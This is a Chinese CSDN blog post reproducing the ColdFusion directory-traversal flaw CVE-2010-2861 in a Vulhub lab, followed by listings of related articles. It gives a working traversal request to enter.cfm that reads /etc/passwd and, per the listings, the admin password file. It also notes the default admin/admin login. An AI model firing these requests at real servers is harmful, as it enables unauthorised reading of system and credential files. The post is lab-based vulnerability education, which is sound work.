Vulhub-coldfusion--CVE-2010-2861

最新推荐文章于 2023-07-02 13:50:41 发布
最新推荐文章于 2023-07-02 13:50:41 发布
阅读量209 收藏
点赞数 1
分类专栏: vulhub 网络安全 文章标签: 安全 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ronin_qianmo/article/details/119210215
版权

1、漏洞描述

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

2、启动靶场

在这里插入图片描述

3、访问地址

http://x.x.x.x:8500
在这里插入图片描述

4、找到登录界面

http://x.x.x.x:8500/CFIDE/administrator/index.cfm
在这里插入图片描述默认登录的用户名个密码都是admin

6、直接访问

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en
中间是base64加密错一个符号都不可以
访问就可以读取到/etc/passwd文件
在这里插入图片描述在这里插入图片描述

5、读取到后台管理员密码

在这里插入图片描述

6、成功访问到网页,即为复现成功

浅陌.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2010-2861漏洞复现(ColdFusion未授权漏洞)
G_Fu_Q的博客
04-08 821
漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.c
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
weixin_50698958的博客
10-02 427
一、概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 参考: https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 二、漏洞环境 路径:vulhub/coldfusion/CVE.
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
易编橙 · 终身成长社群,相遇已是上上签!
10-19 3829
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
CVE-2010-2861(Adobe ColdFusion 文件读取漏洞)
浅笑996的博客
11-27 2586
漏洞介绍 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 环境搭建 https://blog.csdn.net/qq_36374896/article...
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 321
CVE-2010-2861
Dreamweaver-CS5-网页制作.ppt
11-15
6. Dreamweaver 的应用:Dreamweaver 可以使用以下五种服务器技术来设计 Web 应用程序:ColdFusion、ASP、ASP.NET、JSP 和 PHP。 7. Dreamweaver 的功能:Dreamweaver 提供了许多功能强大的工具和功能,例如可视化...
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
SPAW - ColdFusion MX CFC version-开源
05-15
功能齐全,可完全自定义,多语言,可换肤的基于Web的ColdFusion WYSIWYG HTML编辑器控件。 需要Win IE 5.5+(在其他浏览器中显示标准文本区域)。 这是SPAW的ColdFusion MX端口:...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。程式码范例要显示一个充满名为“ read”的查询的生物信息的RTE实例,请执行以下操作: <cfoutput>#...
从三层架构到MVC-MVP
03-02
最近几年被推荐为Sun公司J2EE平台的设计模式,并且受到越来越多的使用ColdFusion和PHP的开发者的欢迎。模型-视图-控制器模式是一个有用的工具箱,它有很多好处,但也有一些缺点。二.MVC是否适合进行大项目的开发...
CVE-2010-2861:Adobe ColdFusion 文件读取漏
Foreverlove112的博客
11-08 313
CVE-2010-2861:Adobe ColdFusion 文件读取漏
Adobe ColdFusion文件读取突破(CVE-2010-2861)
willow_liang的博客
04-15 210
Adobe ColdFusion文件读取漏洞(CVE-2010-2861) 漏洞复现: Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 访问该目录 /CFIDE/administrator/enter.cfm?locale=../../../../../../../..
coldfusion文件读取漏洞(CVE-2010-2861)
1stPeak's Blog
07-28 862
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
实战攻击之CVE-2010-2861 网络攻击实战
网络安全领域优质创作者
11-05 378
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.10 -oX10.11.1.10.xmlxsltproc 扫描之后得到CVE:CVE-2010-2861 Google搜索后得到Adobe ColdFusion - Directory Traversal - Multiple remote Exploit https://github.com/ctfs/write-ups-2014/tree/master/d...
vulhub:Adobe ColdFusion文件读取漏洞复现(CVE-2010-2861)
最新发布
sszsNo1的博客
07-02 248
vulhub:Adobe ColdFusion文件读取漏洞(CVE-2010-2861)如何复现
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1057
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
web 工程课件 西安电子科技大学-软件工程
11-21
* 课程内容:不包括HTML、JavaScript、ActiveX、Flash、PHP、ColdFusion等编程语言的细节,也不包括Web服务器、Servlet引擎设置、人机界面工程等内容 三、评估方式 * 个人表现:出勤、作业、项目、考试等 * 评估...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值